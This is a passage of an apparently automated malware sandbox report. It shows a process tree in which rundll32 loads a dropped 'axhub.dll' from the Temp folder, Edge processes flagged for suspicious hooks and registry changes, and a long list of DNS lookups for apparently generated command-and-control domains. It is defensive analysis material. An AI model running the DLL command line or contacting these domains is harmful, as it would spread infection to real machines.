                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                    1⤵
                                                                                    • Drops file in Windows directory
                                                                                    • Modifies Internet Explorer settings
                                                                                    • Modifies registry class
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:4364
                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                    1⤵
                                                                                    • Modifies Internet Explorer settings
                                                                                    PID:5496
                                                                                  • C:\Windows\system32\rUNdlL32.eXe
                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                    1⤵
                                                                                    • Process spawned unexpected child process
                                                                                    PID:3452
                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                      2⤵
                                                                                      • Loads dropped DLL
                                                                                      • Modifies registry class
                                                                                      PID:5824
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                    1⤵
                                                                                    • Modifies registry class
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:5340
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                    1⤵
                                                                                    • Modifies Internet Explorer settings
                                                                                    • Modifies registry class
                                                                                    PID:3500
                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                      C:\Windows\system32\WerFault.exe -u -p 3500 -s 1844
                                                                                      2⤵
                                                                                      • Program crash
                                                                                      PID:5192
                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                    1⤵
                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                    PID:5756
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                    1⤵
                                                                                      PID:4056
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      PID:5596
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                      1⤵
                                                                                      • Drops file in Windows directory
                                                                                      • Modifies registry class
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:3632
                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                      1⤵
                                                                                      • Modifies Internet Explorer settings
                                                                                      PID:3188
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                      PID:3016
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      PID:3104
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      PID:2064
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      PID:4172
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      PID:5088
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                      • Modifies registry class
                                                                                      PID:5268
                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                      1⤵
                                                                                        PID:5232
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        PID:4892
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        PID:4840
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                          PID:1244
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          PID:3576
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          PID:5360
                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          PID:976

                                                                                        Network

                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002002131-service1002.space
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002002131-service1002.space
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002002231-service1002.space
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002002231-service1002.space
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder3100231-service1002.space
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder3100231-service1002.space
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002002431-service1002.space
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002002431-service1002.space
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002002531-service1002.space
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002002531-service1002.space
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder33417-012425999080321.space
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder33417-012425999080321.space
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321test125831-service10020125999080321.space
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321test125831-service10020125999080321.space
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321test136831-service10020125999080321.space
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321test136831-service10020125999080321.space
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321test147831-service10020125999080321.space
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321test147831-service10020125999080321.space
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321test146831-service10020125999080321.space
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321test146831-service10020125999080321.space
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321test134831-service10020125999080321.space
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321test134831-service10020125999080321.space
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321est213531-service1002012425999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321est213531-service1002012425999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321yes1t3481-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321yes1t3481-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321test13561-service10020125999080321.su
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321test13561-service10020125999080321.su
                                                                                          IN A
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321test13561-service10020125999080321.su
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321test13561-service10020125999080321.su
                                                                                          IN A
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321test13561-service10020125999080321.su
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321test13561-service10020125999080321.su
                                                                                          IN A
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321test13561-service10020125999080321.su
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321test13561-service10020125999080321.su
                                                                                          IN A
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321test13561-service10020125999080321.su
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321test13561-service10020125999080321.su
                                                                                          IN A
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321test14781-service10020125999080321.info
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321test14781-service10020125999080321.info
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321test13461-service10020125999080321.net
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321test13461-service10020125999080321.net
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321test15671-service10020125999080321.tech
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321test15671-service10020125999080321.tech
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321test12671-service10020125999080321.online
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321test12671-service10020125999080321.online
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321utest1341-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321utest1341-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321uest71-service100201dom25999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321uest71-service100201dom25999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321test61-service10020125999080321.website
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321test61-service10020125999080321.website
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321test51-service10020125999080321.xyz
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321test51-service10020125999080321.xyz
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321test41-service100201pro25999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321test41-service100201pro25999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321yest31-service100201rus25999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321yest31-service100201rus25999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321rest21-service10020125999080321.eu
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321rest21-service10020125999080321.eu
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321test11-service10020125999080321.press
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321test11-service10020125999080321.press
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder4561-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder4561-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321rustest213-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321rustest213-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321test281-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321test281-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321test261-service10020125999080321.space
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321test261-service10020125999080321.space
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321yomtest251-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321yomtest251-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321yirtest231-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321yirtest231-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321test391-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321test391-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321test481-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321test481-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321test571-service10020125999080321.pro
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321test571-service10020125999080321.pro
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321test461-service10020125999080321.host
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321test461-service10020125999080321.host
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321test231-service10020125999080321.fun
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321test231-service10020125999080321.fun
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321tostest371-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321tostest371-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321oopoest361-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321oopoest361-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder481-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder481-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder471-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder471-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder351-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder351-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder241-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder241-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-service100201shop25999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-service100201shop25999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-service100201life25999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-service100201life25999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-service100201blog25999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-service100201blog25999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321megatest251-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321megatest251-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321megatest251-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321megatest251-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321infotest341-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321infotest341-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321besttest971-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321besttest971-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321shoptest871-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321shoptest871-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          ka-f.fontawesome.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          ka-f.fontawesome.com
                                                                                          IN A
                                                                                          Response
                                                                                          ka-f.fontawesome.com
                                                                                          IN CNAME
                                                                                          ka-f.fontawesome.com.cdn.cloudflare.net
                                                                                          ka-f.fontawesome.com.cdn.cloudflare.net
                                                                                          IN A
                                                                                          172.64.133.9
                                                                                          ka-f.fontawesome.com.cdn.cloudflare.net
                                                                                          IN A
                                                                                          172.64.132.9
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321kupitest451-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321kupitest451-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321proftest981-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321proftest981-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321clubtest561-service10020125999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321clubtest561-service10020125999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321mytest151-service1002012425999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321mytest151-service1002012425999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfoldert161-service1002012425999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfoldert161-service1002012425999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder100251-service25999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder100251-service25999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder100241-service10020999080321.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder100241-service10020999080321.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder100231-service1022020.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder100231-service1022020.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder100221-service1022020.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder100221-service1022020.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder100221-service1022020.ru
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder100221-service1022020.ru
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-012525999080321.ml
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-012525999080321.ml
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-012625999080321.ga
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-012625999080321.ga
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-012625999080321.ga
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-012625999080321.ga
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-012725999080321.cf
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-012725999080321.cf
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-012825999080321.gq
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-012825999080321.gq
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-012925999080321.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-012925999080321.com
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-01302599908032135.site
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-01302599908032135.site
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-01312599908032135.site
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-01312599908032135.site
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-01322599908032135.site
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-01322599908032135.site
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-01332599908032135.site
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-01332599908032135.site
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-01342599908032135.site
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-01342599908032135.site
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-01352599908032135.site
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
